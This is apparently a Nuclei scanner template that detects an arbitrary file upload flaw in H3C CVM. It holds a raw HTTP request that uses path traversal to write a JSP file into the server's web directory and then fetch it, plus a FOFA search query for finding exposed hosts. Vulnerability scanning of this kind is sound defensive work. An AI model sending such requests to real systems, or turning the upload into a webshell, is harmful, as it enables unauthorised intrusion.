nuclei-templates/http/vulnerabilities/other/h3c-cvm-arbitrary-file-uplo...

48 lines
1.3 KiB
YAML
Raw Normal View History

2023-08-21 03:00:47 +00:00
id: h3c-cvm-arbitrary-file-upload
info:
name: H3C CVM - Arbitrary File Upload
author: SleepingBag945
severity: critical
2023-08-21 03:08:07 +00:00
description: "An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information."
2023-08-21 03:00:47 +00:00
reference:
2023-08-21 03:08:07 +00:00
- "https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml"
2023-08-21 03:00:47 +00:00
metadata:
max-request: 2
verified: true
2023-08-21 03:08:07 +00:00
fofa-query: "server=\"H3C-CVM\""
tags: "h3c, lfi"
2023-08-21 03:00:47 +00:00
variables:
2023-08-21 03:08:07 +00:00
payload_1: "{{randstr_1}}"
payload_2: "{{randstr_2}}"
2023-08-21 03:00:47 +00:00
http:
- raw:
- |
2023-08-21 03:08:07 +00:00
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{payload_1}}.jsp&name=222\" HTTP/1.1
2023-08-21 03:00:47 +00:00
Host: {{Hostname}}
Content-range: bytes 0-10/20
Accept-Encoding: gzip, deflate
{{payload_2}}
- |
GET /cas/js/lib/buttons/{{payload_1}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "{{payload_2}}"
- type: word
part: header
words:
- "Content-Type: text/html"
- type: status
status:
2023-08-21 03:08:07 +00:00
- 200